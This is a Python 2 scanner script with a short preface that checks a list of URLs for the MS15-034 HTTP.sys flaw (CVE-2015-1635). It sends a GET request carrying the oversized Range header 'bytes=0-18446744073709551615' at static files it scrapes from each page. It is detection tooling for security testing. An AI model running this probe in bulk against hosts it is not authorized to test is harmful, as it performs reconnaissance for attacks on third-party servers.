Test MS15-034 (CVE-2015-1635) by using a list of URLs as input
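The probe sends a GET request whose Range header asks for bytes 0 through 18446744073709551615 (2**64 - 1). Unpatched HTTP.sys builds mishandle the oversized upper bound and answer 416 Requested Range Not Satisfiable, while patched hosts return a normal response. A minimal standalone sketch of the same check (the target URL below is a placeholder, not taken from the script):

import requests

requests.packages.urllib3.disable_warnings()

# Placeholder target; point this at a host you are authorized to test.
url = "http://example.com/welcome.png"
r = requests.get(url, headers={"Range": "bytes=0-18446744073709551615"},
                 verify=False, timeout=5)
print "vulnerable" if r.status_code == 416 else "likely patched"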
#!/usr/bin/env python
import optparse
import re
import requests

requests.packages.urllib3.disable_warnings()

class colors:
    def __init__(self):
        self.green = "\033[92m"
        self.blue = "\033[94m"
        self.bold = "\033[1m"
        self.yellow = "\033[93m"
        self.red = "\033[91m"
        self.end = "\033[0m"

color = colors()

#Defining the main function.
def main(url):
    print color.green + "[*] Testing " + color.end + url
    try:
        #Defining the headers. The Range upper bound of 18446744073709551615
        #(2**64 - 1) triggers the HTTP.sys integer overflow on unpatched hosts.
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0",
                   "Accept-Encoding": "gzip, deflate",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Range": "bytes=0-18446744073709551615",
                   "Referer": "https://github.com/zigoo0/",
                   "Connection": "keep-alive"}
        #Sending the request. A 416 response to the oversized range marks the
        #host as vulnerable.
        r = requests.get(url, headers=headers, verify=False, timeout=5)
        if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text:
            print "[*] %s" % (url) + color.red + " is vulnerable!\n" + color.end
            #Adding the vulnerable hosts to a set for later use and to make
            #sure each host is recorded only once.
            vulnerable.add(url)
        else:
            print "[*] Seems %s" % (url) + color.green + " is not vulnerable!\n" + color.end
            #Adding the non-vulnerable hosts to a set for later use.
            fixed.add(url)
    except Exception:
        pass

def parsePage(url):
    #Collect static objects (image src attributes and .swf param values) so
    #the range request can be aimed at a kernel-cached static file.
    resultList = []
    try:
        website = requests.get(url, verify=False)
        html = website.text
        pat = re.compile(r'<\s*img [^>]*src="([^"]+)')
        for x in pat.findall(html):
            resultList.append(x)
        pat = re.compile(r'<param [^>]*value="([^"]+)')
        for x in pat.findall(html):
            if ".swf" in x:
                resultList.append(x)
    except requests.exceptions.ConnectTimeout:
        pass
    except requests.exceptions.SSLError:
        pass
    return resultList

if __name__ == "__main__":
    parser = optparse.OptionParser()
    parser.add_option('-f', action="store", dest="filename", help="file containing list of websites")
    options, remainder = parser.parse_args()
    if options.filename:
        hosts = []
        print color.blue + "[*] Finding static objects on the webpages" + color.end
        urlList = [line.strip() for line in open(options.filename, 'r')]
        for url in urlList:
            uriPathList = parsePage(url)
            if len(uriPathList) > 0:
                #Aim the probe at the first static object found on the page.
                y = url + "/" + uriPathList[0]
                print y
                hosts.append(y)
            else:
                #No static object found; fall back to probing the URL itself.
                print url
                hosts.append(url)
        vulnerable = set()
        fixed = set()
        print "\n"
        for host in hosts:
            main(host.strip())
        print color.red + "[*] %s found to be vulnerable." % (len(vulnerable)) + color.end
        for vuln in vulnerable:
            print "[-] ", vuln
    else:
        parser.print_help()